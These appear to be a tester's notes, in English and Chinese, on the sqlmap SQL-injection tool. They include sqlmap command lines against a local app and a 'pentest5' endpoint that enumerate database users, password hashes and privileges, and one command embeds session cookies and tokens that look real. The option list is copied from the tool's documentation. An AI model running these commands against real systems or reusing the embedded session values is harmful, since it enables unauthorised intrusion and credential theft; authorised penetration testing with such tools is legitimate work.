sqlmap

https://github.com/sqlmapproject/sqlmap

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches including database fingerprinting, over data fetching from the database, accessing the underlying file system, and executing commands on the operating system via out-of-band connections.

http://sqlmap.org/

测试用例

http://localhost:8086/project/controller/action (POST) # C:UserscluDownloadssqlmapproject-sqlmap-d4d83b2sqlmap.py -u http://localhost:8086/project/controller/action --data=search=chuck&periodStatus=0&__RequestVerificationToken=AtQOR018kN6-nWlDQxFKI-9_-4Ni7JnZaNKTPMlbZFIzuK1Lz889_M0Wf5sYQ-H14fWTfUI0jJYFTYL30

search=chuck&periodStatus=0&__RequestVerificationToken=AtQOR018kN6-nWlDQxFKI-9_-4Ni7JnZaNKTPMlbZFIzuK1Lz889_M0Wf5sYQ-H14fWTfUI0jJYFTYL30

%userprofile%AppDataLocalsqlmapoutputlocalhost

 .sqlmap.py -u "https://host:port/pentest5/Campaign/GetMyCampaignList" --data="search=cam&periodStatus=0&__RequestVerificationToken=Hgf410s-TtjOD2MoQFIQ7ebBFik__POnfJ3kbJjQ8CLK1XyS-d3GyY6gd_UHCkQs0cSTKfVks77VnBz00" --cookie="WebSession=4bpzpunlduq5z0cpzf5ysmnr; __RequestVerificationToken=h5owU63jNKlDzObOGxW4h7caJMJfDsBnxcN2U9Vj_iHQku9mkd-OY4GSgjG_YGzfnWLMYg2; _ga=GA1.2.2054830099.1592468707; _gid=GA1.2.1238954720.1592468707; EdenredAdminSite=D9DB90E84FE929C84DB3C85E98AE621C5866E18BC145A78037513899550B3CA1039C2E89B3B8FED91E2EBFD0FB210E156C14C94C1E03112CCA2A81F5923D7421A7DF72E09A6551AA3485B380362E69ABA5B025EEA6AB8AFA712D19859EF6C2654C61C14F17A09F87F330BAC4D0440C87E74E778EF6E3D6D00E54CCE964C8B83995287D2CBA4576422C7FAD7B2C3D61A2CE47064FFCE860C8C589EA9E3F3994FDDB9F49C889E9A4380A57C6C2022503A54F15A98705F1F0A9DDC51795CDF614558C9C9D7D29085F27143F78D3EB8F3BC220DBA41BC257BFC941413B16DBA2A015318417A4F9261C105DE0703176DB969D48D89FC3C945258E415AAD9CB927EFB43B88F37DF0ACA143423F0B22CB6804E5931466F243A939474B3EA80AE7EF32959106A5B062C62C5FB26E63F8; EdenredParticipantSite=711332B299FB9664209A49D30D437D637D5A4E181980464C896E36530CE845C19F8E3CACAD91DCC386385050164D33AD9E74F6195D91A210291F260AC5371BD831B6094C7B5723858FB8FE4654DB793C25835355593FDE328D4F6E35192FE58742E85A29B669175C8B7FC4DB1252E75FD43EA254EBBA26CEACC1EFAB8CBCC18E83CB48B80FDE3B22DA3D3B369E49F6C5BBF2D8D36CDA2D9A1258CF6DB6C43049883F88992C07EF2B51D56E95E670FB878FE8F77DAF0E21BD45B668D28563A1669234602C188290EF6187D3AC99BFCA92ADFDCE86226F4443D7DDEFA1C46B4D4373DA392837D7CE27C630008303D1E50665E689B8C4D2DE4402D051C7CB5A06320185FAF86A85AAB05B1BA1EDCBEAF45D7974610C3D3E9DC388C600238B56E2324AC274C9E315F3004CA2C08F3CEA38538FE34435" --delay=0 --timeout=30 -retries=0 -p "search, periodStatus" --dbms="Microsoft SQL Server" --os=Windows --level=3 --risk=1 --threads=4 --time-sec=5 -b --current-user --current-db --hostname --is-dba --users --passwords --privileges --roles --dbs --batch --answers="crack=N,dict=N"

参数说明

https://github.com/sqlmapproject/sqlmap/wiki/Usage

-u URL, --url=URL   Target URL (e.g. "http://www.site.com/vuln.php?id=1")

--data=DATA         Data string to be sent through POST (e.g. "id=1")

--cookie=COOKIE     HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")

--delay=DELAY       Delay in seconds between each HTTP request

--timeout=TIMEOUT   Seconds to wait before timeout connection (default 30)

--retries=RETRIES   Retries when the connection timeouts (default 3)

-p TESTPARAMETER    Testable parameter(s)

--dbms=DBMS         Force back-end DBMS to provided value

-os=OS             Force back-end DBMS operating system to provided value

--level=LEVEL       Level of tests to perform (1-5, default 1)
--risk=RISK         Risk of tests to perform (1-3, default 1)

--threads=THREADS   Max number of concurrent HTTP(s) requests (default 1)

--time-sec=TIMESEC  Seconds to delay the DBMS response (default 5)

Enumeration:
    These options can be used to enumerate the back-end database
    management system information, structure and data contained in the
    tables. Moreover you can run your own SQL statements

-b, --banner        Retrieve DBMS banner

--current-user      Retrieve DBMS current user

--current-db        Retrieve DBMS current database

--hostname          Retrieve DBMS server hostname

--is-dba            Detect if the DBMS current user is DBA

--users             Enumerate DBMS users
--passwords         Enumerate DBMS users password hashes

--privileges        Enumerate DBMS users privileges

--roles             Enumerate DBMS users roles
--dbs               Enumerate DBMS databases

General:
    These options can be used to set some general working parameters

--batch             Never ask for user input, use the default behavior

--answers=ANSWERS   Set predefined answers (e.g. "quit=N,follow=N")